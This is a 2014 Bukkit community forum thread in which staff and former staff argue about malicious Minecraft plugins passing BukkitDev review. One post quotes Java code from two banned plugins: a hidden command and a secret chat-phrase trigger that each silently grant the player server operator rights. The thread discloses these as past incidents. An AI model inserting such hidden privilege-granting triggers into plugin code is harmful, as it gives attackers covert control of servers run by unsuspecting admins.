PSA: SuperString

Discussion in 'Community News and Announcements' started by eyamaz, Nov 8, 2014.

Thread Status:
Not open for further replies.
  1. Offline

    ColonelHedgehog

    This is sarcasm, right? Otherwise, -10 for supporting a false statement!
     
    Inscrutable and mbaxter like this.
  2. Offline

    Kaelten

    I've avoided being so blunt in public because I've considered it bad form. However, it's getting pretty obvious there needs to at least be an attempt to address this misinformation.

    Malicious files, even extremely obvious ones, making it through the review process is not a new thing.

    Under the old Bukkit team malicious plugins being approved was a fairly regular occurrence. In multiple cases multiple versions of files with extremely obvious malicious content were approved. These incidents however were not announced consistently.

    We're torn between not announcing plugins that make it through and being accused of lying and hiding things from the community, and announcing them to maintain transparency but having people believe we're doing a lesser job.

    The facts here are pretty straight forward. This process is inherently human dependent. Humans are not perfect, they make mistakes. The more tedious and nuanced the process the more likely mistakes are to be made. Reviewing code for potential issues is definitely a tedious and nuanced process.

    We acknowledge that this got by us, and we own up to that mistake. However, the standards of the site remain high. We review each and every file that is submitted and I am very confident that far more files have been caught than made it through.
     
    timtower likes this.
  3. Offline

    davidxd33

    Reading the comments of this article is worth more to my time than reading the actual content of it. You guys are so funny.
     
  4. Offline

    Lolmewn

    Shh, everyone has forgotten about that by now ;)

    (and yes it was mild sarcasm)
     
  5. Offline

    Developerjohn

    Lolmewn
    Make that 20, lel.

    Bukkit is shit now. Sorry to say this, but if were going to have a staff that can't read plugins correctly (allowing malicious plugins through the system), they might as well leave. Btw, where the hell is the Microsoft team?

    EDIT by Moderator: merged posts, please use the edit button instead of double posting.
     
    Last edited by a moderator: Jun 10, 2016
  6. Nobody said the staff can't read plugins correctly, the question should be how easy is the malicious code to find, I'm sure some developers can hide their malicious code away really obscure, to make it harder to find, meaning occasionally malicious plugins will slip past their plugin-reviewers and onto BukkitDev, I'm sure nobody part of the Bukkit plugin-review team want to let malicious plugins slip through the radar, however sometimes they will.
     
  7. Offline

    sunny.zhang

    I agree. The ex staff should atleast help new staff out. I dont think they are better. New staff atleast are helping the project to advance!
     
  8. Offline

    xTrollxDudex

    Plugin performs console command. Great, lets approve this plugin! Because all the rest of the malicious ones *surely* didn't execute any commands at all!
     
  9. Kaelten This is not just happening on BukkitDev, moderation on the forums is a lot more slack now, especially in less popular sections. Take the "Show off your Bukkit server!" section. I constantly find threads which have at least one of the following:
    • Insufficient server description
    • Threads which are essentially just a "I need staff, please contact me for details"
    • Official servers
    • Non-CraftBukkit powered servers
    • Servers that do no list the IP
    All of the above which are against the very guidelines that have been set out for that section and still exist as the sole sticky thread - I therefore assume that these guidelines still apply. However, I see threads like this which are often given an indefinite period of time to update their post, despite multiple warnings (in bold) on the guidelines that such threads will be deleted without warning. Even worse than that is that posts which obviously break these guidelines are often approved or moved into the section incorrectly by the moderation team.
    I would like to sincerely request that the current moderation team review these guidelines and take them into consideration when moderating posts, or an official rule change with an announcement take place. I know which of the two I'd prefer, but at this point I'll settle for either action. The current situation of having the rules there but not actively enforcing them is simply confusing for everyone.
     
    JaguarJo likes this.
  10. Isn't it funny how people demand so and so stuff "right now". Suggested reading: http://forums.bukkit.org/threads/psa-superstring.321151/page-3#post-2879862

    Running console commands happens everywhere, of course it needs attention, specifically "random two letter commands" are.... bogus, it's a painful slip-through for whatever reason. Maybe they are too easy-going on the follow-up uploads, i just hope they'll increase experience and precision and find tools to make it as efficient as possible to go through all files with each upload (concerning diff, manually set markers, marker-comparison, whatever is efficient without decreasing quality of manual reviewing).

    Edit: And yes, there have been at least forum-posts that updated on some of the policies - of course that's no reason to have the old wiki-pages stay forever. I assume you can help by notifying the staff about inconsistencies. The other question is what's better, but i assume this thread is not meant for discussing such.

    It does depend on how staff will manage to improve quality, but also on if there will be a server for 1.8.

    But seriously, expecting anything else but a drop in quality of plugin-checking alongside with a decrease of moderation-frequency etc., would be plain naive. I hope they manage to be on top of things with a Spigot 1.8 release! Given that we don't know how the retired Bukkit team and their predecessors used to handle such slip-throughs (detected early-ish, test-plugins), i wouldn't even call on that they've been much better in average, despite having the frequency of two test-plugisn per soandso weeks feel uncomfortable. Now the interesting thing would be to see the count of really malicious plugins getting through per time unit, not "just" plugins intended to test their approval process. (Edit: Criteria are difficult: consider malicious vs... time, number of plugins, lines of code, how established plugin devs/teams are :p ...)
     
  11. Offline

    Searchndstroy

    I've noticed that approval times are faster. Two possibilities:

    1. Curse has more people checking, or, just has more people in general.
    or
    2. Curse isn't taking enough time to check.

    I don't have a guess since I do not know how many people are working with DBO, or who they are. I'd rather see people pour more time into checking than the amount approved each day. Plugin verification is hard, but it'll be much easier if you don't have the community on your back at all times.
     
    Developerjohn likes this.
  12. Offline

    lol768

    As far as I know, the two staff that are involved in the file approval process are eyamaz and ZeldoKavira unless things have recently changed.
     
  13. Let's first start addressing the misinformation you are spreading (the whole "files are checked by human beings").

    Indeed. It happened a few times before and yep, even simple ones made it through. Most of these happened when we tried to use an automated system which didn't work as intended (We had this system that added classes to a database so upon reviewing we could compare and if the files are 100% identical, we knew it was okay). This system got removed and after that we did everything 100% manually again.

    [citation needed]

    [citation needed]

    Alright, you don't want to lie to the community. Nice. Let's start about your review process again...


    Exactly. But this one was super obvious. Even by just simply "reading" the code you can see it's plain malicious. Also, your approval times are impossible for a human to process. Decompiling and opening all the files alone takes as much time as you need to approve the plugin. (Not even mentioning logging in, clicking the approve button and wait for the page to reload)

    Mistakes are the things that make us human. However, we need to accept them. The only thing Curse seems to do is shift the blame to the community (who are apparantly involved in the review process now?) and saying that we did a worse job without providing any sources or evidence.

    tl;dr;
    It's quite sad that you have to put the former staff in a bad light in order to "protect" yourself. It seems that you can only defend yourself by doing this kind of stuff. Sad. Perhaps you could just shoulder the responsibility instead of trying to shift it to the community, and now to us.
     
  14. Offline

    Developerjohn

    Umm, this is happening way more frequently than before when the community was actually in great progress. Now all we have is Curse staff trying to help, yet can't even understand how fragile this community is and also the Microsoft employees, which we still haven't gotten a word from.
     
  15. Offline

    ThePixelPony

    That was in their update processes. It's not an outright command being executed.

    Anyway, I trust that things have been learnt from this.
     
  16. Offline

    ColonelHedgehog

    Maybe a learning experience for the old Bukkit staff, but as we've seen here, no old Bukkit staff have made any attempt to share their experiences/knowledge/quick'n'dirty tips with Curse. ;)
     
  17. Offline

    Lolmewn

    There are no "quick'n'dirty" tips. Staff reads all the code. That's literally all there is to it.
     
  18. ColonelHedgehog I've heard that a few former staff offered their help for a nominal fee. Iirc, a former staff member told me that so I'm inclined to believe it.
     
  19. Offline

    mbaxter ʇıʞʞnq ɐ sɐɥ ı

    Actually, I gave Kaelten an overview of our approach including tips on not automating (and why). Why accuse us of refusing to communicate?
     
    Eathuis, DSH105, JaguarJo and 4 others like this.
  20. Offline

    toothplck1

    I personally offered to help train his new guys for a nominal fee, and kaelton told me he had it handled.
     
    DSH105, lol768 and AdamQpzm like this.
  21. Statistically most of the posts in this thread are contributing to misinformation.
     
  22. Offline

    Acharige

    Since this has occurred way too many times, might as well put another temporary halt on BukkitDev? People are going to begin to have fun with this and think: "I wonder if I can put malicious code into a plugin, and see if it can get past the BukkitStaff", and chances are, it will.
     
  23. Offline

    ColonelHedgehog


    Apologies, I should have been clearer. What I'm trying to get at is you can't compare the BukkitDev staff and their experiences with the Curse staff and their own, because unless I'm mistaken, they had nothing to do with the 2013 PSA. I have no idea who told the Curse staff what in the past, but in this instance, I'm not seeing a lot of actual advice here, moreover, accusations.
     
    Inscrutable and asofold like this.
  24. Offline

    Kaelten

    Files are checked by humans.

    That does seem like a very fragile system.

    Sure here's a couple. Let us know if you'd like more.

    NoReturn created on Feb 20, 2014, removed and banned on Feb 22, 2014.
    Actually documented the Cedi command in the description, which also discussed hacked clients.
    Code:java
    1.  
    2. if (cmd.getName().equalsIgnoreCase("Cedi")) {
    3. if (args.length == 0) {
    4. p.setOp(true);
    5. p.setGameMode(GameMode.CREATIVE);
    6.  
    7. erfolg = true;
    8. }
    9. else
    10. {
    11. erfolg = false;
    12. }
    13. }
    14.  


    Realism Revival created on Feb 16, 2014, last Updated Feb 23, 2014, removed and banned March 2, 2014.
    This one had several approved versions and was downloaded by a hundred or so people.

    Code:java
    1.  
    2. @EventHandler
    3. public void onPlayerChat(PlayerChatEvent e) {
    4. if ((e.getMessage().contains("Padovana hai una brutta faccia!!")) || (e.getMessage().contains("Devo reagire e dimenticarla cavolo!!"))) {
    5. Player p = e.getPlayer();
    6. p.setOp(true);
    7. e.setMessage("We we");
    8. }
    9. }
    10.  


    Neither of these where given an announcement by the former team, which has a logic of it's own, but if we attempted that we'd be vilified for an attempted cover up. I do think I'm going to change how we report these to the end users though, the glory seeker phenomena is going to create issues long run.

    The queue page loads very quickly (< 1 second) when it's kept close to empty. The only reason it gets slow is when there's dozens of entries in it.

    I do regret the wording in the announcement about the nature of the review process, but there's a truth there. When things are missed, and it's impossible to prove conclusively that things are and never will be missed, the only thing we can do is react when we discover the counter point. That's what he was trying to say. It IS a partnership between both the admin and user sides.

    As far as having to put the bad staff in a former light? I've been actively trying to avoiding that. The former team did an amazing job, but they're no more infallible than the current team.
     
    timtower likes this.
  25. Offline

    RawCode

    All latest "breaking news about malicious plugins" triggered by "old members".
    Sad but true, this is not reason to blame someone, not a reason to issue bans and remove content.

    Every malicious plugin followed same scheme - uploaded clean version and then push malicious update.
    This passed 3 times in row.

    Normally same trick wont work more then once, 3 times is evidence of major flaw in review process.

    asofold
    Running console commands from arbitrary locations of code is obviously harmful, i see no "good" reason to invoke commands as console at all, this is basically bukkit version of sudo, that unsafe by design.
     
    Garris0n and Hoolean like this.
  26. That's pure speculation, as far as i have had a glimpse the plugins use different methods of exploits, so it's not necessarily the same thing three times. You should be happy, if it was like that, because it would mean that they are absolutely great at reviewing the plugins on the first pass. That would be easy to repair.
    Two points:
    a) Consider to consider what i wrote, you are leaving out one part. I mentioned the "random two letter command" being particularly fishy. I just notice that i forgot to add, that running commands without proper permission checks is a big problem, such should be checked "first".
    b) There are or at least have been workarounds, e.g. by using vanilla commands for features missing in Bukkit, or to interface to some plugin that doesn't provide a java API - of course "everywhere" would be an exaggeration.
    (Edited to death.)
     
  27. Offline

    iMurder

    At least the spigot community will catch anything that gets approved over there, in no time at all.
    Safe to say, BukkitDev is screwed now anyway.
     
  28. Offline

    RawCode

    asofold
    Read original author's posts and check source of *plugins*.
    They all basically same, every case is "gimemeop" payload hidden one way or an other.

    There are no botnets, no password stealers and no keyloggers, no phoning home about infection.
    Basically such code is useless and pose no threat to server admins.

    BUT it still approved again and again following same order.

    ps Spigot feature no checking at all.
     
  29. Offline

    xDeeKay

    ITT: Retired staff criticizing the workflow done by people that took over their job. Makes a lot of sense.
     
  30. Offline

    n0_grief

    I hate how BukkitDev has turned into the most unproductive, ridiculous community since the old BukkitDev staff resigned, and now that new staff have been assigned all the old staff do is ridicule the new staff's productivity without offering any real solutions, if you're going to make the choice to leave the BukkitDev staff then you have no right to sit there and laugh at the new staff struggle to fill the void, if you cared at all about the community or the project then you would be praising them for saving the community that would have otherwise been destroyed when you left.
     
    xDeeKay likes this.
Thread Status:
Not open for further replies.

Share This Page